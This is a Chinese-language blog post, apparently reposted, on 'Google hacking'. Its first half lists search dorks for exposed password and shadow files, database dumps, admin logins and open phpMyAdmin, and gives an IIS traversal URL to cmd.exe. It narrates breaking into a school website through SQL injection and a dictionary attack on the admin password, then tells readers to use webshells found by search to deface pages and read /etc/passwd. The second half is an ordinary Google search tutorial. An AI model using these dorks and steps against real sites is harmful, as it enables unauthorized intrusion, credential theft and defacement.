Google高級技巧—google Hack★★★★
google hacking其實並算不上什麽新東西,當時並沒有重視這種技術,認為webshell什麽的,並無太大實際用途.google hacking其實並非如此簡單...
常用的google關鍵字:
foo1 foo2 (也就是關聯,比如搜索xx公司 xx美女)
operator:foo
filetype:123 類型
site:foo.com 相對直接看網站更有意思,可以得到許多意外的信息
intext:foo
intitle: fooltitle 標題哦
allinurl:foo 搜索xx網站的所有相關連接。(踩點必備)
links:foo 不要說就知道是它的相關鏈接
allintilte:foo.com
我們可以輔助"-" "+"來調整搜索的精確程度
直接搜索密碼:(引號表示為精確搜索)
當然我們可以再延伸到上面的結果裏進行二次搜索
"index of" htpasswd / passwd
filetype:xls username password email
"ws_ftp.log"
"config.php"
allinurl:admin mdb
service filetype:pwd ....或者某個比如pcanywhere的密碼後綴cif等
越來越有意思了,再來點更敏感信息
"robots.txt" "Disallow:" filetype:txt
inurl:_vti_cnf (FrontPage的關鍵索引啦,掃描器的CGI庫一般都有地)
allinurl: /msadc/Samples/selector/showcode.asp
/../../../passwd
/examples/jsp/snp/snoop.jsp
phpsysinfo
intitle:index of /admin
intitle:"documetation"
inurl: 5800(vnc的端口)或者desktop port等多個關鍵字檢索
webmin port 10000
inurl:/admin/login.asp
intext:Powered by GBook365
intitle:"php shell*" "Enable stderr" filetype:php 直接搜索到phpwebshell
foo.org filetype:inc
ipsec filetype:conf
intilte:"error occurred" ODBC request where (select|insert) 說白了就是說,可以直接試著查查數據庫檢索,針對目前流行的sql註射,會發達哦
"Dumping data for table" username password
intitle:"Error using Hypernews"
"Server Software"
intitle:"HTTP_USER_AGENT=Googlebot"
"HTTP_USER_ANGET=Googlebot" THS ADMIN
filetype:.doc site:.mil classified 直接搜索軍方相關word
檢查多個關鍵字:
intitle:config confixx login password
"mydomain.com" nessus report
"report generated by"
"ipconfig"
"winipconfig"
google緩存利用(hoho,最有影響力的東西)推薦大家搜索時候多"選搜索所有網站"
特別推薦:administrator users 等相關的東西,比如名字,生日等……最慘也可以拿來做字典嘛
……
一些技巧集合:
1) index.of.password
1) filetype:blt "buddylist"
2) "access denied for user" "using password"
2) intitle:"index of" inurl:ftp (pub | incoming)
3) "http://
3) filetype:cnf inurl:_vti_pvt access.cnf
4) auth_user_file.txt
4) allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
5) The Master List
5) inurl:"install/install.php"
6) allinurl: admin mdb
6) intitle:"welcome.to.squeezebox"
7) passlist.txt (a better way)
7) intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
8) "A syntax error has occurred" filetype:ihtml
8) intitle:Login intext:"RT is ? Copyright"
9) "# -FrontPage-" inurl:service.pwd
9) ext:php program_listing intitle:MythWeb.Program.Listing
10) orA-00921: unexpected end of SQL command
10) intitle:index.of abyss.conf
NO2:
--------------------------------------------------------------------------------
google hacking的簡單實現
使用google中的一些語法可以提供給我們更多的信息(當然也提供給那些習慣攻擊的人更多他們所想要的.),下面就來介紹一些常用的語法.
intext:
這個就是把網頁中的正文內容中的某個字符做為搜索條件.例如在google裏輸入:intext:動網.將返回所有在網頁正文部分包含"動網"的網頁.allintext:使用方法和intext類似.
intitle:
和上面那個intext差不多,搜索網頁標題中是否有我們所要找的字符.例如搜索:intitle:安全天使.將返回所有網頁標題中包含"安全天使"的網
頁.同理allintitle:也同intitle類似.
cache:
搜索google裏關於某些內容的緩存,有時候也許能找到一些好東西哦.
define:
搜索某個詞語的定義,搜索:define:hacker,將返回關於hacker的定義.
filetype:
這個我要重點推薦一下,無論是撒網式攻擊還是我們後面要說的對特定目標進行信息收集都需要用到這個.搜索指定類型的文件.例如輸入
:filetype:doc.將返回所有以doc結尾的文件URL.當然如果你找.bak、.mdb或.inc也是可以的,獲得的信息也許會更豐富:)
info:
查找指定站點的一些基本信息.
inurl:
搜索我們指定的字符是否存在於URL中.例如輸入:inurl:admin,將返回N個類似於這樣的連接http://www.xxx.com/xxx/admin
陸的URL不錯.allinurl也同inurl類似,可指定多個字符.
link:
例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了鏈接的URL.
site:
這個也很有用,例如:site:www.4ngel.net.將返回所有和4ngel.net這個站有關的URL.
對了還有一些*作符也是很有用的:
+ 把google可能忽略的字列如查詢範圍
- 把某個字忽略
~ 同意詞
. 單一的通配符
* 通配符,可代表多個字母
"" 精確查詢
下面開始說說實際應用
以下內容均在google上搜索,對於一個居心叵測的攻擊者來說,可能他最感興趣的就是密碼文件了.而google正因為其強大的搜索能力往往會
把一些敏感信息透露給他們.用google搜索以下內容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
有時候因為各種各樣的原因一些重要的密碼文件被毫無保護的暴露在網絡上,如果被別有用心的人獲得,那麽危害是很大的
同樣可以用google來搜索一些具有漏洞的程序,例如ZeroBoard前段時間發現個文件代碼泄露漏洞,可以用google來找網上使用這套程序的站點:
intext:ZeroBoard filetype:php
或者使用:
inurl:outlogin.php?_zb_path= site:.jp
來尋找我們所需要的頁面.phpmyadmin是一套功能強大的數據庫*作軟件,一些站點由於配置失誤,導致我們可以不使用密碼直接對phpmyadmin進行*作.我們可以用google搜索存在這樣漏洞的程序URL:
intitle:phpmyadmin intext:Create new database
還http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe?
allinurl:winnt system32
前面已經簡單的說過可以用google來搜索數據庫文件,用上一些語法來精確查找能夠獲得更多東西(access的數據庫,mssql、mysql的連接文件等等).舉個例子示例一下:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data //在一些配置不正確的apache+win32的服務器上經常出現這種情況,和上面的原理一樣,我們還可以用google來找後臺.
利用google完全是可以對一個站點進行信息收集和滲透的,下面我們用google對特定站點進行一次測試。
首先用google先看這個站點的一些基本情況(一些細節部分就略去了):
site:xxxx.com
從返回的信息中,找到幾個該校的幾個系院的域名:
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
順便ping了一下,應該是在不同的服務器.學校一般都會有不少好的資料,先看看有什麽好東西沒
site:xxxx.com filetype:doc
得到N個不錯的doc。
先找找網站的管理後臺地址:
site:xxxx.com intext:管理
site:xxxx.com inurl:login
site:xxxx.com intitle:管理
超過獲得2個管理後臺地址:
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp
還算不錯,看看服務器上跑的是什麽程序:
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:.......
......
a2服務器用的應該是IIS,上面用的是asp的整站程序,還有一個php的論壇
a3服務器也是IIS,aspx+asp。web程序都應該是自己開發的。有論壇那就看看能不能遇見什麽公共的FTP帳號什麽的:
site:a2.xxxx.com intext:ftp://*:*
沒找到什麽有價值的東西。再看看有沒有上傳一類的漏洞:
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
在a2上發現一個上傳文件的頁面:
http://a2.xxxx.com/sys/uploadfile.asp
用IE看了一下,沒權限訪問。試試註射,
site:a2.xxxx.com filetype:asp
得到N個asp頁面的地址,體力活就讓軟件做吧,這套程序明顯沒有對註射做什麽防範,dbowner權限,雖然不高但已足矣,back a shell不太喜
歡,而且看起來數據庫的個頭就不小,直接把web管理員的密碼暴出來再說,MD5加密過。一般學校的站點的密碼都比較有規律,通常都是域名+
電話一類的變形,用google搞定吧。
site:xxxx.com //得到N個二級域名
site:xxxx.com intext:*@xxxx.com //得到N個郵件地址,還有郵箱的主人的名字什麽的
site:xxxx.com intext:電話 //N個電話
把什麽的信息做個字典吧,掛上慢慢跑。過了一段時間就跑出4個帳號,2個是學生會的,1個管理員,還有一個可能是老師的帳號。登陸上去:
name:網站管理員
pass:a2xxxx7619 //說了吧,就是域名+4個數字
要再怎麽提權那就不屬於本文討論訪問了,呵呵,到此為止。
這段時間在國外的一些google hack的研究站點看了看,其實也都差不多是一些基本語法的靈活運用,或者配合某個腳本漏洞,主要還是靠
個人的靈活思維。國外對於google hack方面的防範也並不是很多,所以大家還是點到為止,不要去搞破壞拉,呵呵。對於一些在win上跑
apache的網管們應該多註意一下這方面,一個intitle:index of就差不多都出來了:)
1.查找利用php webshell
intitle:"php shell*" "Enable stderr" filetype:php
(註: intitle—網頁標題 Enable stderr—UNIX標準輸出和標準錯誤的縮寫filetype—文件類型)。搜索結果中,你能找到很多直接在機器上執
行命令的web shell來。如果找到的PHPSHELL不會利用,如果你不熟悉UNIX,可以直接看看LIST,這裏就不詳細說了,有很多利用價值。要說明
的是,我們這裏搜索出來的一些國外的PHPSHELL上都要使用UNIX命令,都是system調用出來的函數(其實用百度及其他搜索引擎都可以,只是填
寫搜索的內容不同)。這個PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句話就把首頁搞定了:
echo "召喚" > index.jsp
現在看看首頁,已經被我們改成: "召喚" 了。
我們也可以用WGET上傳一個文件上去(比如你要替換的葉子吧)。然後execute Command輸入 cat file > index.html or echo "" > file
echo "test" >> file
這樣一條條打出來,站點首頁就成功被替換了。同樣的也可以
uname -a;cat /etc/passwd
不過有點要註意,有些WEBSHELL程序有問題,執行不了的,
2.搜索INC敏感信息
在google的搜索框中填入:
Code:
.org filetype:inc
===
轉的...........info:xx.com 返回一些基本信息
site:xx.com 返回所有與該有關的url
link:xx.com 返回所有與該站做了連接的站
site:xx.com filetype:txt 查找TXT文件 其他的依次內推
查找後臺
site:xx.com intext:管理
site:xx.com inurl:login
site:xx.com intitle:後臺
查看服務器使用的程序
site:xx.com filetype:asp
site:xx.com filetype:php
site:xx.com filetype:jsp
site:xx.com filetype:aspx
查看上傳漏洞:
site:xx.com inurl:file
site:xx.com inurl:load
查找註射點:
site:xx.com filetype:asp ================== 一,GOOGLE簡介
Google(www.google.com)是一個搜索引擎,由兩個斯坦福大學博士生Larry Page與Sergey Brin於1998年9月發明,Google Inc. 於1999年創立。2000年7月份,Google替代Inktomi成為Yahoo公司的搜索引擎,同年9月份,Google成為中國網易公司的搜索引擎。98年至今,GOOGLE已經獲得30多項業界大獎。
二,GOOGLE特色
GOOGLE支持多達132種語言,包括簡體中文和繁體中文;
GOOGLE網站只提供搜索引擎功能,沒有花裏胡哨的累贅;
GOOGLE速度極快,據說有8000多臺服務器,200多條T3級寬帶;
GOOGLE的專利網頁級別技術PageRank能夠提供高命中率的搜索結果;
GOOGLE的搜索結果摘錄查詢網頁的部分具體內容,而不僅僅是網站簡介;
GOOGLE智能化的“手氣不錯”功能,提供可能最符合要求的網站;
GOOGLE的“網頁快照”功能,能從GOOGLE服務器裏直接取出緩存的網頁。
三,基本搜索:+,-,OR
GOOGLE無需用明文的“+”來表示邏輯“與”操作,只要空格就可以了。
示例:搜索所有包含關鍵詞“易筋經”和“吸星**”的中文網頁
搜索:“易筋經 吸星**”
結果:已搜索有關易筋經 吸星**的中文(簡體)網頁。共約有726項查詢結果,這是第1-10項。搜索用時0.13秒。
註意:文章中搜索語法外面的引號僅起引用作用,不能帶入搜索欄內。
GOOGLE用減號“-”表示邏輯“非”操作。
示例:搜索所有包含“易筋經”而不含“吸星**”的中文網頁
搜索:“易筋經 -吸星**”
結果:已搜索有關易筋經 -吸星**的中文(簡體)網頁。共約有5,440項查詢結果,這是第1-10項。搜索用時0.13秒。
註意:這裏的“+”和“-”號,是英文字符,而不是中文字符的“+”和“-”。此外,操作符與作用的關鍵字之間,不能有空格。比如“易筋經 - 吸星**”,搜索引擎將視為邏輯“與”操作,中間的“-”被忽略。
GOOGLE用大寫的“OR”表示邏輯“或”操作。但是,關鍵字為中文的或查詢似乎還有BUG,無法得到正確的查詢結果。
示例:搜索包含布蘭妮“Britney”或者披頭士“Beatles”、或者兩者均有的中文網頁。
搜索:“britney OR beatles”
結果:已搜索有關britney OR beatles的中文(簡體)網頁。共約有14,600項查詢結果,這是第1-10項。搜索用時0.08秒。
搜索:“布蘭妮 OR 披頭士”
結果:找不到和您的查詢-布蘭妮 OR 披頭士-相符的網頁。
註意:小寫的“or”,在查詢的時候將被忽略;這樣上述的操作實際上變成了一次“與”查詢。
“+”和“-”的作用有的時候是相同的,都是為了縮小搜索結果的範圍,提高查詢結果命中率。
例:查閱天龍八部具體是哪八部。
分析:如果光用“天龍八部”做關鍵字,搜索結果有26,500項,而且排前列的主要與金庸的小說《天龍八部》相關,很難找到所需要的資訊。可以用兩個方法減少無關結果。
1,如果你知道八部中的某一部,比如阿修羅,增加“阿修羅”關鍵字,搜索結果就只有995項,可以直接找到全部八部,“天龍八部 阿修羅”。
2,如果你不知道八部中的任何一部,但知道這與佛教相關,可以排除與金庸小說相關的記錄,查詢結果為1,010項,可以迅速找到需要的資料,“天龍八部 佛教 -金庸”。
四,輔助搜索:通配符、大小寫、句子、忽略字符以及強制搜索
GOOGLE不支持通配符,如“*”、“?”等,只能做精確查詢,關鍵字後面的“*”或者“?”會被忽略掉。
GOOGLE對英文字符大小寫不敏感,“GOD”和“god”搜索的結果是一樣的。
GOOGLE的關鍵字可以是詞組(中間沒有空格),也可以是句子(中間有空格),但是,用句子做關鍵字,必須加英文引號。
示例:搜索包含“long, long ago”字串的頁面。
搜索:“"long, long ago"”
結果:已向英特網搜索"long, long ago". 共約有28,300項查詢結果,這是第1-10項。搜索用時0.28秒。
註意:和搜索英文關鍵字串不同的是,GOOGLE對中文字串的處理並不十分完善。比如,搜索“"啊,我的太陽"”,我們希望結果中含有這個句子,事實並非如此。查詢的很多結果,“啊”、“我的”、“太陽”等詞語是完全分開的,但又不是“啊 我的 太陽”這樣的與查詢。顯然,GOOGLE對中文的支持尚有欠缺之處。
GOOGLE對一些網路上出現頻率極高的詞(主要是英文單詞),如“i”、“com”,以及一些符號如“*”、“.”等,作忽略處理,如果用戶必須要求關鍵字中包含這些常用詞,就要用強制語法“+”。
示例:搜索包含“Who am I ?”的網頁。如果用“"who am i ?"”,“Who”、“I”、“?”會被省略掉,搜索將只用“am”作關鍵字,所以應該用強制搜索。
搜索:“"+who +am +i"”
結果:已向英特網搜索"+who +am +i". 共約有362,000項查詢結果,這是第1-10項。搜索用時0.30秒。
註意:英文符號(如問號,句號,逗號等)無法成為搜索關鍵字,加強制也不行。
五,高級搜索:site,link,inurl,allinurl,intitle,allintitle
“site”表示搜索結果局限於某個具體網站或者網站頻道,如“sina.com.cn”、“edu.sina.com.cn”,或者是某個域名,如“com.cn”、“com”等等。如果是要排除某網站或者域名範圍內的頁面,只需用“-網站/域名”。
示例:搜索中文教育科研網站(edu.cn)上所有包含“金庸”的頁面。
搜索:“金庸 site:edu.cn”
結果:已搜索有關金庸 site:edu.cn的中文(簡體)網頁。共約有2,680項查詢結果,這是第1-10項 。搜索用時0.31秒。
示例:搜索包含“金庸”和“古龍”的中文新浪網站頁面,
搜索:“金庸 古龍 siteina.com.cn”
結果:已在sina.com.cn搜索有關金庸 古龍的中文(簡體)網頁。共約有869項查詢結果,這是第1-10項。搜索用時0.34秒。
註意:site後的冒號為英文字符,而且,冒號後不能有空格,否則,“site:”將被作為一個搜索的關鍵字。此外,網站域名不能有“http”以及“www”前綴,也不能有任何“/”的目錄後綴;網站頻道則只局限於“頻道名.域名”方式,而不能是“域名/頻道名”方式。諸如“金庸 site:edu.sina.com.cn/1/”的語法是錯誤的。
“link”語法返回所有鏈接到某個URL地址的網頁。
示例:搜索所有含指向華軍軟件園“www.newhua.com”鏈接的網頁。
搜索:“link:www.newhua.com”
結果:搜索有鏈接到www.newhua.com的網頁。共約有695項查詢結果,這是第1-10項。搜索用時0.23秒。
註意:“link”不能與其他語法相混合操作,所以“link:”後面即使有空格,也將被GOOGLE忽略。
inurl語法返回的網頁鏈接中包含第一個關鍵字,後面的關鍵字則出現在鏈接中或者網頁文檔中。有很多網站把某一類具有相同屬性的資源名稱顯示在目錄名稱或者網頁名稱中,比如“MP3”、“GALLARY”等,於是,就可以用INURL語法找到這些相關資源鏈接,然後,用第二個關鍵詞確定是否有某項具體資料。INURL語法和基本搜索語法的最大區別在於,前者通常能提供非常精確的專題資料。
示例:查找MIDI曲“滄海一聲笑”。
搜索:“inurl:midi 滄海一聲笑”
結果:已搜索有關inurl:midi 滄海一聲笑的中文(簡體)網頁。共約有14項查詢結果,這是第1-10項。搜索用時0.01秒。
示例:查找微軟網站上關於windows2000的安全課題資料。
搜索:“inurlecurity windows2000 site:microsoft.com”
結果:已在microsoft.com內搜索有關 inurlecurity windows2000的網頁。共約有198項查詢結果,這是第1-10項。搜索用時0.37秒。
註意:“inurl:”後面不能有空格,GOOGLE也不對URL符號如“/”進行搜索。GOOGLE對“cgi-bin/phf”中的“/”當成空格處理。
allinurl語法返回的網頁的鏈接中包含所有查詢關鍵字。這個查詢的對象只集中於網頁的鏈接字符串。
示例:查找可能具有PHF安全漏洞的公司網站。通常這些網站的CGI-BIN目錄中含有PHF腳本程序(這個腳本是不安全的),表現在鏈接中就是“域名/cgi-bin/phf”。
語法:“allinurl:"cgi-bin" phf +com”
搜索:已向英特網搜索allinurl:"cgi-bin" phf +com. 共約有40項查詢結果,這是第1-10項。搜索用時0.06秒。
allintitle和intitle的用法類似於上面的allinurl和inurl,只是後者對URL進行查詢,而前者對網頁的標題欄進行查詢。網頁標題,就是HTML標記語言title中之間的部分。網頁設計的一個原則就是要把主頁的關鍵內容用簡潔的語言表示在網頁標題中。因此,只查詢標題欄,通常也可以找到高相關率的專題頁面。
示例:查找禁止發有關政治的貼子明星藤原紀香的照片集。
搜索:“intitle:藤原紀香 寫真”
結果:已搜索有關intitle:藤原紀香 寫真的中文(簡體)網頁。共約有284項查詢結果,這是第1-10項。搜索用時0.03秒。
GOOGLE的罕用高級搜索語法:related,cache,info
related用來搜索結構內容方面相似的網頁。例:搜索所有與中文新浪網主頁相似的頁面(如網易首頁,搜狐首頁,中華網首頁等),“related:www.sina.com.cn/index.shtml”。
cache用來搜索GOOGLE服務器上某頁面的緩存,這個功能同“網頁快照”,通常用於查找某些已經被刪除的死鏈接網頁,相當於使用普通搜索結果頁面中的“網頁快照”功能。
info用來顯示與某鏈接相關的一系列搜索,提供cache、link、related和完全包含該鏈接的網頁的功能。
示例:查找和新浪首頁相關的一些資訊。
搜索:“infwww.sina.com.cn”
結果:有關www.sina.com.cn的網頁信息。
新浪首頁
北京站 上海站 廣東站. ... 遊戲世界, |, 影音娛樂, |, Club緣, |, 男
人女人, |, 論壇聊天, |, 時尚潮流, |, 文教育兒, |, 車行天下, |,
軟件下載. ...
Google 提供這個網址的信息:
查看Google網頁快照裏www.sina.com.cn的存檔
尋找和www.sina.com.cn類似的網頁
尋找網頁有鏈接到www.sina.com.cn
尋找網頁包含有`www.sina.com.cn`
六,其他重要功能
目錄服務
如果不想搜索網頁,而是想尋找某些專題網站,可以訪問GOOGLE的分類目錄“http://directory.google.com/”,中文目錄是“http://directory.google.com/Top/World/Chinese_Simplified/”。不過由於GOOGLE的目錄由誌願者服務,而GOOGLE在國內名氣相對比較小,因此中文目錄下收錄站點很少。
工具條
為了方便搜索者,GOOGLE提供了工具條,集成於瀏覽器中,用戶無需打開GOOGLE主頁就可以在工具條內輸入關鍵字進行搜索。此外,工具條還提供了其他許多功能,如顯示頁面PageRank等。最方便的一點在於用戶可以快捷的在GOOGLE主頁、目錄服務、新聞組搜索、高級搜索和搜索設定之間切換。欲安裝GOOGLE的工具條,可以訪問“http://toolbar.google.com/”,按頁面提示可以自動下載並安裝。
新聞組(USENET)搜索
新聞組中有大量的有價值信息,DEJA一直是新聞組搜索引擎中的佼佼者。2001年2月份,GOOGLE將DEJA收購並提供了所有DEJA的功能。現在,除了搜索之外,GOOGLE還支持新聞組的WEB方式瀏覽和張貼功能。
輸入“http://groups.google.com/”後,便進入GOOGLE新聞組界面。可惜現在還沒有中文界面。因為新聞組中的帖子實在是多,所以我點擊“Advaced Groups Search”進入高級搜索界面http://groups.google.com/advanced_group_search。新聞組高級搜索界面提供對關鍵字、新聞組、主題、作者、帖子序號、語言和發布日期的條件搜索。其中作者項指作者發帖所用的唯一識別號電子信箱。比如要在alt.chinese.text內搜索著名老牌網絡寫手圖雅的帖子,可以用下列指令“group:alt.chinese.text author:[email protected]”。不過一般而言,我更推薦使用圖形搜索界面,方便而且直觀。
搜索結果翻譯
曾經為那些你不懂的法文、西班牙文頁面煩惱麽?現在,GOOGLE支持一項搜索結果翻譯功能,可以把非英文的搜索結果翻譯成英文!!雖然目前只支持有限的拉丁語、法語、西班牙語、德語和葡萄牙文,但是我不得不承認,這是個偉大的改進。
不過,目前只能在英文狀態GOOGLE下實現這個功能。進入GOOGLE的設置頁面,http://www.google.com/preferences,有一個“BETA: Enable translation of search results into your interface language. ”的選項,把它選中,就OK了。
搜索結果過濾
網絡上的成人內容浩如煙海,而且很多站點具有欺騙或者其他不良企圖,瀏覽者很容易掉入其中的陷阱。為此,GOOGLE新設立了成人內容過濾功能,見GOOGLE的設置頁面,http://www.google.com/preferences,最底下有一個選項SafeSearch Filtering。不過,中文狀態下的GOOGLE尚沒有這個功能。
PDF文檔搜索
我對GOOGLE尤其欣賞的一點就是它提供對PDF文檔內文的檢索。目前GOOGLE檢索的PDF文檔大約有2500萬左右。這真是太美妙了。PDF是ADOBE公司開發的電子文檔格式,現在已經成為互聯網的電子化出版標準。PDF文檔通常是一些圖文並茂的綜合性文檔,提供的資訊一般比較集中全面。
示例:搜索關於電子商務(ECOMMERCE)的PDF文檔。
搜索:“inurldf ecommerce”
結果:已向英特網搜索inurldf ecommerce. 共約有19,200項查詢結果,這是第1-10項。搜索用時0.11秒。
下面是某項搜索結果:
[PDF] www.usi.net/pdf/outsoucing-ecommerce.pdf
Outsourcing Electronic Commerce Business Case White Paper By: John P. Sahlin, Product
Marketing Professonial (PMP) Implementation Manager, Web Engineering ...
一般文字檔 - 類似網頁
可以看到,GOOGLE在PDF檔前加上了[PDF]的標記,而且,GOOGLE把PDF文件轉換成了文字檔,點擊“一般文字檔”,可以粗略的查看該PDF文檔的大致內容。當然,PDF原有的圖片以及格式是沒有了。
圖像文檔搜索
GOOGLE提供了Internet上圖像文件的搜索功能!!目前該功能尚在B測試階段,但已經非常好用。訪問地址是“images.google.com”。你可以在關鍵字欄位內輸入描述圖像內容的關鍵字,如“britney spears”,也可以輸入描述圖像質量或者其他屬性的關鍵字,如“high quality”。
GOOGLE給出的搜索結果具有一個直觀的縮略圖(THUMBNAIL),以及對該縮略圖的簡單描述,如圖像文件名稱,以及大小等。點擊縮略圖,頁面分成兩禎,上禎是圖像之縮略圖,以及頁面鏈接,而下禎,則是該圖像所處的頁面。屏幕右上角有一個“Remove Frame”的按鈕,可以把框架頁面迅速切換到單禎的結果頁面,非常方便。GOOGLE還提供了對成人內容圖像的限制功能,可以讓搜索者免受不必要的騷擾。
不過,非常遺憾的是,圖像搜索功能還不支持中文。
再分享一下我老師大神的人工智能教程吧。零基礎!通俗易懂!風趣幽默!希望你也加入到我們人工智能的隊伍中來!https://www.cnblogs.com/captainbed
Google高級技巧—google Hack★★★★